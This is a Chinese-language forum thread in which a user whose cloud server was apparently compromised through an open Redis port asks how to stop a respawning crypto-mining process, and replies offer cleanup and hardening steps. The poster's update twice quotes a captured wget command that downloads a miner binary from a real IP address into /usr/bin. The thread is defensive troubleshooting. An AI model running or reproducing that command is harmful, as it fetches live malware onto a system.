占用 cpu100% 杀死进程 , 删除异常文件,1 小时后自动创建异常文件,啊啊啊啊啊,降维打击!!! 求大佬
This topic created in 2232 days ago, the information mentioned may be changed or developed.
Supplement 1 · Apr 18, 2020
解决问题过程
top 查询进程 ps -ef | grep 进程号 可以定位到进程所在路径
删除之后 还是会自动回复
没有查到任何的定时任务
通过 ps -ef 关闭可疑进程
监听到可疑命令
wget -q -T1800 http://103.27.42.76:41933/static/5023/ddgs.x86_64 -O /usr/bin/uvggee
top 查询进程 ps -ef | grep 进程号 可以定位到进程所在路径
删除之后 还是会自动回复
没有查到任何的定时任务
通过 ps -ef 关闭可疑进程
监听到可疑命令
wget -q -T1800 http://103.27.42.76:41933/static/5023/ddgs.x86_64 -O /usr/bin/uvggee
 |
1
yulihao Apr 11, 2020
重装 100%解决问题
还有记得用证书登陆 SSH 或者 fail2ban |
 |
2
sholmesian Apr 11, 2020 via iPhone
备份数据,重做系统。
|
 |
3
crll Apr 11, 2020 via iPhone
重做系统吧 然后更换 ssh 端口 证书登录 修改密码或者停用 root
|
 |
4
goofool Apr 11, 2020 via Android
crontab -l
|
 |
5
sunziren Apr 11, 2020
会不会有个定时任务,自动复活挖矿病毒?
|
 |
6
shellic Apr 11, 2020 via Android
当年下班前在阿里云的服务器上装了个 redis,没来得及配置结果吃了个饭的功夫就被黑了
|
 |
7
ying5201314 OP 阿里云的 redis 端口没做防护,被美国网址扫描到了,然后就被挖矿了,,,
|
 |
8
buzailianxi Apr 11, 2020 via Android
查看你的定时任务删掉,然后很多二进制文件被替换可能
|
 |
9
poisedflw Apr 11, 2020
@ying5201314 第一步要把他往.ssh/authorized_keys 中写的内容干掉,如果 root 删不掉,记得用 chattr 改下属性。
关掉 redis 修改 hosts 把挖矿地址指到 127.0.0.1 接着删掉 crontab 中的内容 清理 tmp 下的挖矿脚本 redis 加密码,做好安全组防护 秘钥登录 |
 |
10
simonlu9 Apr 11, 2020
镜像还原
|
 |
11
nnnToTnnn Apr 11, 2020
我很好奇,它是怎么做到 1 小时后自动创建异常文件的。
我所知道的。 通过 1. @goofool 的 crontab -l, 2. 如果是 debian 的服务器,注册 启动的 service 在下次启动的时候创建异常文件 3. 还有就是通过 /etc/rc.local 来创建文件? 4. 进程存在恶意程序,定时创建异常文件? 5. 通过 ssh 的证书登入,scp 来进行创建文件? 这是什么病毒,能很好的做定时任务的重启,我表示很想学习以下 |
 |
12
learningman Apr 11, 2020
@nnnToTnnn 还有替换系统自带的命令的
|
 |
13
defunct9 Apr 11, 2020 via iPhone
开 ssh,让我上去看看
|
 |
14
qwerthhusn Apr 11, 2020
它会改你的二进制文件,甚至 cd,ls 都是动过手脚的,最简单的就是重装,加强安全防护
|
 |
15
PHPer233 Apr 11, 2020 via Android
1. 你的服务器可能存在某个漏洞,导致黑客能够随时入侵并植入恶意软件。2. 黑客给你的服务器设置了某种后门,即使 kill 进程后也会自动下载运行挖矿软件。
|
 |
16
zxfgds Apr 11, 2020
oh , 估计百分之八十可能 redis 未设置密码, 然后 端口开放到公网了吧?
|
|
17
zxfgds Apr 11, 2020
CTRL+回车 怎么就发送了呢.
检查所有用户的 crontab 删除之 , 然后删除异常文件 , redis 设置密码, 不对公网开放 . 修改 ssh 默认端口. 重启 ,解决问题. |
 |
18
wmhx Apr 11, 2020
如果是 root 进程的,那么重装吧,没有更好办法啦.
如果是普通用户就全部干掉. |
 |
19
bzw875 Apr 11, 2020
唉,我买的 2 个外网 vps 都被黑了,厂商直接关掉我 vps
|
 |
20
iamwin Apr 12, 2020
别用一键脚本,自己重装系统
|
 |
21
andj4cn Apr 12, 2020
echo 0 > 挖矿脚本
这样一般可以暂时解决问题 |
 |
22
shanghj Apr 18, 2020  1
可能楼主已经解决了,我写一下我的解决方案吧。
1 )先用 top 或 htop 命令查看异常进程的 PID 、用户( USER )、执行文件( FILE )。 2 ) kill -9 PID (强制停止异常进程),sudo rm -rf FILE (删除异常进程的执行文件) 3 ) crontab -l (查看定时任务,解决自动恢复,不过一般定时任务没问题, 编辑定时任务用 crontab -e) 4 ) su root ; passwd -l USER (切换 root,并锁定异常账户登录,恢复登录用 pass -u USER) 下面的是重点,用来处理复现问题。 5 ) cd /var/spool/cron/ && ll (进入定时任务目录,查看上面 USER 的定时任务,如果确定不是自己创建的,用 rm -rf 命令删除,并排查一下其他用户的定时任务(尤其是 root )) 6 ) cd /etc/cron.d/ && ll (用 cat 查看这里的定时任务文件或脚本,找到自动恢复病毒的文件,直接 rm 删除) 这里说一下,1:尽量不要用一键脚本,或者用前先读一遍,防止中招(感觉要是会,谁还用一键脚本?所以,建议不用) 2:对于宝塔一键面板,谨慎使用,尤其是第三方个人开发的免费插件(我在第三方插件中发现过挖矿脚本) 3:不必要的端口尽量不要开,避免被扫到。很多时候我们的服务器不做处理,在一些人眼里简直就像裸奔一样。 |
|
23
ying5201314 OP @poisedflw 感谢老哥,时间过了,不能投币了
|
Select Language